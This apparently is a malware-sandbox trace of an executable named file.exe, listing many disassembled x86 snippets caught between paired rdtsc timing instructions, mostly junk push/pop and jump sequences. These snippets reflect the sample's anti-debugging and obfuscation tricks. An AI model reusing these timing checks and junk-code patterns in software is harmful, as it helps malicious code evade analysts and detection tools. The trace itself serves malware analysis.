                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFCAA second address: FBFCE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d jmp 00007F230C5197AAh 0x00000012 pop ecx 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F230C5197B1h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFCE5 second address: FBFCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBFD7C second address: FBFD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F230C5197A6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC023D second address: FC0244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0609 second address: FC0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0612 second address: FC065F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a call 00007F230C515284h 0x0000000f mov dword ptr [ebp+12469D82h], esi 0x00000015 pop edx 0x00000016 lea eax, dword ptr [ebp+124710CFh] 0x0000001c jmp 00007F230C515281h 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 js 00007F230C515276h 0x0000002b jc 00007F230C515276h 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC065F second address: FC0665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0665 second address: FC0669 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0669 second address: FA6F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 ja 00007F230C5197A6h 0x00000019 popad 0x0000001a popad 0x0000001b nop 0x0000001c mov edx, esi 0x0000001e call dword ptr [ebp+122D1BF2h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6F55 second address: FA6F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnc 00007F230C51528Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6F74 second address: FA6F93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F230C5197B6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6F93 second address: FA6FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F230C515276h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F230C515286h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6FB9 second address: FA6FE7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F230C5197A6h 0x00000008 jmp 00007F230C5197B3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 je 00007F230C5197A6h 0x0000001a push edx 0x0000001b pop edx 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6FE7 second address: FA6FFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F230C51527Fh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC683 second address: FFC687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC687 second address: FFC695 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F230C51527Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC695 second address: FFC699 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC98B second address: FFC991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC991 second address: FFC997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC997 second address: FFC99C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC99C second address: FFC9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003ED1 second address: 1003EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515283h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003EE9 second address: 1003EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003EEE second address: 1003F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C51527Ah 0x00000009 pop eax 0x0000000a jc 00007F230C51527Ch 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jc 00007F230C515286h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003F26 second address: 1003F2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1003F2A second address: 1003F2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004631 second address: 1004635 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004635 second address: 1004651 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A43 second address: 1004A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jne 00007F230C5197A6h 0x0000000c jl 00007F230C5197A6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 pop eax 0x00000016 jmp 00007F230C5197B5h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A6F second address: 1004A75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004A75 second address: 1004A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BCE second address: 1004BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BD2 second address: 1004BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F230C5197ABh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BF0 second address: 1004BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004BF4 second address: 1004C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B9h 0x00000007 ja 00007F230C5197A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004C1A second address: 1004C25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004EEC second address: 1004EF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004EF0 second address: 1004F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F230C515278h 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F230C51527Ch 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F0F second address: 1004F25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F230C5197ABh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1004F25 second address: 1004F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10053BD second address: 10053CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C5197ACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10087A3 second address: 10087B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C515282h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10087B9 second address: 10087CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jp 00007F230C5197A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F52 second address: 1007F69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F230C515282h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F69 second address: 1007F6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F6F second address: 1007F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1007F75 second address: 1007F79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008129 second address: 1008148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F230C515289h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008148 second address: 100814E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10082E6 second address: 1008303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515288h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1008303 second address: 100831E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F230C5197AAh 0x0000000a jmp 00007F230C5197AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB5A second address: 100AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB5E second address: 100AB75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F230C5197B1h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100AB75 second address: 100AB8A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C515287h 0x00000008 jmp 00007F230C51527Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100A894 second address: 100A8AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 popad 0x0000000a push edi 0x0000000b push eax 0x0000000c jng 00007F230C5197A6h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F3F2 second address: 100F3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100F3F6 second address: 100F3FC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC93 second address: 100EC97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100EC97 second address: 100ECDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F230C5197B6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 popad 0x00000013 push esi 0x00000014 push ecx 0x00000015 jmp 00007F230C5197ACh 0x0000001a pop ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100ECDB second address: 100ECDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101315F second address: 1013168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1013168 second address: 101316C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101316C second address: 1013170 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012740 second address: 1012758 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F230C515280h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10128D7 second address: 10128E1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C5197A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10128E1 second address: 1012912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b jo 00007F230C51529Bh 0x00000011 pushad 0x00000012 jmp 00007F230C515283h 0x00000017 jmp 00007F230C51527Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A1B second address: 1012A25 instructions: 0x00000000 rdtsc 0x00000002 je 00007F230C5197ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A25 second address: 1012A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F230C515287h 0x0000000e jmp 00007F230C51527Fh 0x00000013 push edx 0x00000014 pop edx 0x00000015 jno 00007F230C51527Ch 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A50 second address: 1012A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A59 second address: 1012A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012A65 second address: 1012A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1012D53 second address: 1012D5D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F230C515276h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1018794 second address: 10187A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187A6 second address: 10187B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187B4 second address: 10187BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187BA second address: 10187BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10187BE second address: 10187CE instructions: 0x00000000 rdtsc 0x00000002 jc 00007F230C5197A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10207A3 second address: 10207A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEC1 second address: 101EEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnp 00007F230C5197A6h 0x0000000c jg 00007F230C5197A6h 0x00000012 jns 00007F230C5197A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEDB second address: 101EEEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jnl 00007F230C515276h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EEEA second address: 101EEEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F193 second address: 101F197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F764 second address: 101F768 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F768 second address: 101F76E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F76E second address: 101F786 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007F230C5197A6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F230C5197A6h 0x00000012 jo 00007F230C5197A6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101F786 second address: 101F7BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F230C515276h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 jmp 00007F230C515286h 0x00000016 jmp 00007F230C515281h 0x0000001b pop esi 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDAC second address: 101FDC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F230C5197AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F230C5197A6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101FDC3 second address: 101FDE8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F230C515276h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F230C515285h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 102010F second address: 102014A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jnp 00007F230C5197EBh 0x0000000c jmp 00007F230C5197B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F230C5197B9h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1027F0C second address: 1027F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F230C515288h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028192 second address: 1028199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028199 second address: 10281C3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F230C51527Ah 0x00000008 push ecx 0x00000009 jmp 00007F230C51527Eh 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jnc 00007F230C515276h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10281C3 second address: 10281D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F230C5197A6h 0x00000009 jns 00007F230C5197A6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028480 second address: 1028485 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1028485 second address: 1028493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F230C5197A6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
